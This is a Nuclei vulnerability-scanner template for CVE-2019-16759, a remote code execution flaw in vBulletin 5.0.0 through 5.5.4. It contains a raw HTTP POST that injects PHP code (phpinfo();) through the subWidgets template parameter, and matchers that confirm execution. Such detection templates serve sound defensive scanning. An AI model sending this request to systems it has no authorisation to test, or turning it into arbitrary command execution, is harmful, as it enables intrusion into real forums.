nuclei-templates/cves/2019/CVE-2019-16759.yaml

37 lines
1.1 KiB
YAML

id: CVE-2019-16759
info:
name: vBulletin v5.0.0-v5.5.4 Remote Command Execution
author: madrobot
severity: critical
description: "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request."
reference:
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vbulletin-remote-code-execution-cve-2020-7373/
- https://nvd.nist.gov/vuln/detail/CVE-2019-16759
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2019-16759
cwe-id: CWE-94
tags: cve,cve2019,vbulletin,rce
requests:
- raw:
- |
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "PHP Version"
# Enhanced by mp on 2022/03/29